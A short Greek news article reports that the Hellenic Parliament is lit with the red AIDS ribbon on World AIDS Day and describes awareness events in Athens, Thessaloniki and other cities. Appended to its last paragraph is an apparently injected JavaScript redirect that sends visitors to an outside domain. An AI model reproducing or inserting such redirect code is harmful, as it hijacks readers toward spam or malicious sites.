Η Bουλή φωτίστηκε κόκκινη την Παγκόσμια Μέρα κατά του AIDS

0
7

 

H Βουλή των Ελλήνων φωταγωγήθηκε για πρώτη φορά στην ιστορία της με ειδικούς προβολείς με την κόκκινη κορδέλα (Red ribbon) που συμβολίζει τον αγώνα κατά του AIDS, σήμερα Παγκόσμια μέρα κατά της νόσου.

Οι εορτασμοί για την Παγκόσμια Ημέρα κατά του AIDS στην Ελλάδα έχουν επίκεντρο την Αθήνα. Η φιλαρμονική ορχήστρα του Δήμου Αθηναίων, η ομάδα κρουστών «Quilombo» και τα μέλη και οι εθελοντές του Συλλόγου Οροθετικών Ελλάδος «Θετική Φωνή» περιμένουν το κοινό στην Πλατεία Συντάγματος, όπου υπό τους ήχους τους γίνεται ο σχηματισμός της κόκκινης κορδέλας με κεριά, στη μνήμη όσων έχασαν τη ζωή τους εξαιτίας του AIDS.

Αντίστοιχες εκδηλώσεις θα λάβουν χώρα στην Πλατεία Αριστοτέλους στη Θεσσαλονίκη σε συνεργασία με το ΚΕΕΛΠΝΟ και άλλες οργανώσεις από την Κοινωνία των Πολιτών, καθώς και σε 20 πόλεις της περιφέρειας, σε μία προσπάθεια ευαισθητοποίησης του κοινού σχετικά με το HIV/AIDS, τα δικαιώματα των οροθετικών ατόμων, την πρόληψη, την τακτική εξέταση και τη σεξουαλική αγωγή εν γένει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here